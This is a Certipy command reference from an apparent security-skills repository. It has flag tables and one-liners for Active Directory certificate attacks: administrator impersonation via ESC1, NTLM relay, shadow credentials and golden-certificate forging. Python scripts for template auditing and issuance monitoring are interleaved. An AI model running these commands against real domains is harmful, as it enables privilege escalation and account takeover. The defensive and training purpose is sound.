Anthropic-Cybersecurity-Skills/skills/exploiting-adcs-with-certipy/references/api-reference.md
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817)
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

Certipy Command Reference

Package: certipy-ad (binary: certipy). Source: https://github.com/ly4k/Certipy/wiki

Subcommands

| Subcommand | Purpose |
| --- | --- |
| certipy find | Enumerate CAs, templates, and enrollment endpoints; flag ESC vulnerabilities |
| certipy req | Request (or forge via SAN) a certificate from a template |
| certipy auth | Authenticate with a PFX via PKINIT/Schannel; recover TGT + NT hash |
| certipy relay | Relay coerced NTLM into AD CS HTTP/RPC web enrollment (ESC8/ESC11) |
| certipy shadow | Shadow Credentials attack on msDS-KeyCredentialLink |
| certipy ca | Manage/backup the CA, enable templates, manage officers |
| certipy template | Read/modify certificate template configuration (ESC4) |
| certipy forge | Forge a Golden Certificate from a stolen CA key |
| certipy account | Create/modify/query machine and user accounts |
| certipy cert | Manipulate PFX/PEM certificate files (convert, extract) |

Common Authentication Flags

| Flag | Meaning |
| --- | --- |
| -u USER@DOMAIN | Username (UPN form) |
| -p PASSWORD | Cleartext password |
| -hashes [LM]:NT | Pass-the-hash authentication |
| -k / -no-pass | Use Kerberos authentication with the ccache in KRB5CCNAME / skip the password prompt |
| -dc-ip IP | Domain Controller IP |
| -ns IP / -dns-tcp | DNS resolver / use TCP for DNS |
| -target HOST | Target CA/host FQDN |
| -debug | Verbose output |

certipy find Flags

| Flag | Meaning |
| --- | --- |
| -vulnerable | Show only templates/CAs Certipy deems vulnerable |
| -enabled | Only enabled templates |
| -hide-admins | Hide built-in admin ACEs in output |
| -stdout | Print report to stdout |
| -text | Write a text report file |
| -json / -bloodhound | Output JSON / BloodHound-ingestible data |

certipy req Flags

| Flag | Meaning |
| --- | --- |
| -ca NAME | Target Certificate Authority name |
| -template NAME | Certificate template to enroll in |
| -upn UPN | SAN UserPrincipalName to impersonate (ESC1) |
| -dns NAME | SAN dNSName to impersonate |
| -sid SID | Embed objectSid (strong mapping) |
| -pfx FILE | Output PFX path |
| -application-policies OID | ESC15 application policy abuse |
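The conditions Certipy reports as ESC1 under `find -vulnerable`, and which `req -upn` then relies on, can be checked on the defensive side against exported template attributes before an attacker does. The following is an added audit example, not Certipy's own code and not part of this reference: the template records are constructed, the attribute names (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, pKIExtendedKeyUsage) are the real schema attributes, and enrollment rights are simplified to a list of principal names standing in for the template's security descriptor.

```python
"""Audit AD CS certificate templates for the ESC1 misconfiguration.

Added example (not Certipy code). A template is ESC1 when all four hold:
  1. the enrollee may supply the subject/SAN in the CSR,
  2. the EKU set permits domain authentication (or is unrestricted),
  3. no manager approval is required,
  4. low-privileged principals hold enrollment rights.
Template records below are constructed; enrollment rights are a simplified
list of principal names rather than a parsed security descriptor.
"""

# Bit flags from the MS-CRTD specification
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that make a certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups that effectively mean "any domain principal can enroll"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def has_auth_eku(ekus):
    """Empty pKIExtendedKeyUsage means no EKU restriction, which also permits auth."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_reasons(tpl):
    """Return the ESC1 conditions this template meets (all four => vulnerable)."""
    reasons = []
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject (SAN is caller-controlled)")
    if has_auth_eku(tpl["pKIExtendedKeyUsage"]):
        reasons.append("EKU permits client authentication")
    if not (tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS):
        reasons.append("no manager approval required")
    if LOW_PRIV_PRINCIPALS & set(tpl["enroll_rights"]):
        reasons.append("low-privileged principals can enroll")
    return reasons


def is_esc1(tpl):
    return len(esc1_reasons(tpl)) == 4


def audit(templates):
    """Map template name -> reasons for every template meeting all ESC1 conditions."""
    return {t["name"]: esc1_reasons(t) for t in templates if is_esc1(t)}


# Constructed sample templates (not real directory data)
TEMPLATES = [
    {"name": "VulnTpl", "msPKI-Certificate-Name-Flag": 0x00000001,
     "msPKI-Enrollment-Flag": 0x00000000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_rights": ["Domain Users"]},                 # all four conditions: ESC1
    {"name": "User", "msPKI-Certificate-Name-Flag": 0x82000000,
     "msPKI-Enrollment-Flag": 0x00000000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "enroll_rights": ["Domain Users"]},                 # subject built from AD, not ESC1
    {"name": "ApprovedSubject", "msPKI-Certificate-Name-Flag": 0x00000001,
     "msPKI-Enrollment-Flag": 0x00000002,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_rights": ["Domain Users"]},                 # manager approval blocks it
    {"name": "AdminOnly", "msPKI-Certificate-Name-Flag": 0x00000001,
     "msPKI-Enrollment-Flag": 0x00000000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_rights": ["Domain Admins"]},                # enrollment restricted
    {"name": "LegacyAny", "msPKI-Certificate-Name-Flag": 0x00000001,
     "msPKI-Enrollment-Flag": 0x00000000,
     "pKIExtendedKeyUsage": [],
     "enroll_rights": ["Domain Computers"]},             # no EKU restriction: ESC1
]

if __name__ == "__main__":
    for name, reasons in audit(TEMPLATES).items():
        print(f"{name}: ESC1")
        for r in reasons:
            print(f"  - {r}")
```

Remediation for anything the audit flags is the inverse of the conditions: clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the subject is built from the AD object, require manager approval, or restrict enrollment rights to the group that genuinely needs the template.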

certipy relay Flags (ESC8/ESC11)

| Flag | Meaning |
| --- | --- |
| -target http://CA | HTTP web enrollment target (ESC8) |
| -target rpc://CA | RPC ICertPassage target (ESC11) |
| -template NAME | Template to request (e.g. DomainController, User) |
| -ca NAME | CA name when relaying |

certipy shadow Flags

| Flag | Meaning |
| --- | --- |
| shadow auto | Add KeyCredential, auth, dump hash, restore — end to end |
| shadow add/list/clear/info | Granular KeyCredential operations |
| -account NAME | Target account (victim, dc$) |

Example One-Liners

```bash
certipy find -u u@corp.local -p 'pw' -dc-ip 10.0.0.100 -vulnerable -stdout
certipy req -u u@corp.local -p 'pw' -ca CORP-CA -template VulnTpl -upn administrator@corp.local -sid S-1-5-21-...-500
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100
certipy relay -target http://CA.CORP.LOCAL -template DomainController
certipy shadow auto -u u@corp.local -p 'pw' -dc-ip 10.0.0.100 -account victim-dc$
certipy forge -ca-pfx CORP-CA.pfx -upn administrator@corp.local
```
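On the monitoring side, the issuance trail these one-liners leave can be reviewed after the fact. The following added example (not Certipy code, not part of this reference) checks issued-certificate records for two indicators: a SAN UPN naming an account other than the one that enrolled (the ESC1 pattern of the `req -upn` line) and the DomainController template issued to a principal outside the known domain controller set (the template the relay line requests). The export and its column layout (request_id, requester, template, san_upn) are constructed assumptions standing in for a CA database export, and the known-DC list is likewise constructed.

```python
"""Review issued-certificate records for AD CS abuse indicators.

Added example (not Certipy code). The CSV export and its columns are a
constructed stand-in for a CA database export; KNOWN_DCS is constructed too
and would be sourced from the directory in practice.
Rule 1 (ESC1 indicator): SAN UPN account != enrolling account.
Rule 2: DomainController template issued to a non-DC principal.
"""
import csv
import io

# Constructed sample export (not real CA data)
SAMPLE_EXPORT = """request_id,requester,template,san_upn
101,CORP\\alice,User,alice@corp.local
102,CORP\\u,VulnTpl,administrator@corp.local
103,CORP\\DC01$,DomainController,
104,CORP\\WS05$,DomainController,
105,CORP\\bob,User,bob@corp.local
"""

KNOWN_DCS = {"dc01$", "dc02$"}  # constructed; real list comes from AD


def account_of(requester):
    """'CORP\\alice' -> 'alice': strip the NetBIOS domain prefix, case-fold."""
    return requester.split("\\")[-1].lower()


def upn_account(upn):
    """'administrator@corp.local' -> 'administrator'; empty SAN -> ''."""
    return upn.split("@", 1)[0].lower() if upn else ""


def check_record(row):
    """Return the indicators a single issuance record triggers."""
    findings = []
    requester = account_of(row["requester"])
    san_account = upn_account(row["san_upn"])
    if san_account and san_account != requester:
        findings.append(
            f"SAN UPN {row['san_upn']} names a different account than requester "
            f"{row['requester']} (ESC1 indicator)")
    if row["template"].lower() == "domaincontroller" and requester not in KNOWN_DCS:
        findings.append(
            f"DomainController template issued to {row['requester']}, "
            f"which is not a known domain controller")
    return findings


def scan(export_text):
    """Map request_id -> indicators for every record that triggers a rule."""
    results = {}
    for row in csv.DictReader(io.StringIO(export_text)):
        findings = check_record(row)
        if findings:
            results[row["request_id"]] = findings
    return results


if __name__ == "__main__":
    for rid, findings in scan(SAMPLE_EXPORT).items():
        for finding in findings:
            print(f"request {rid}: {finding}")
```

Records 102 and 104 in the constructed export are the ones that surface. A real feed would carry the same fields from the CA's issued-certificate view, and each hit is a candidate for revocation plus a review of the template that allowed it.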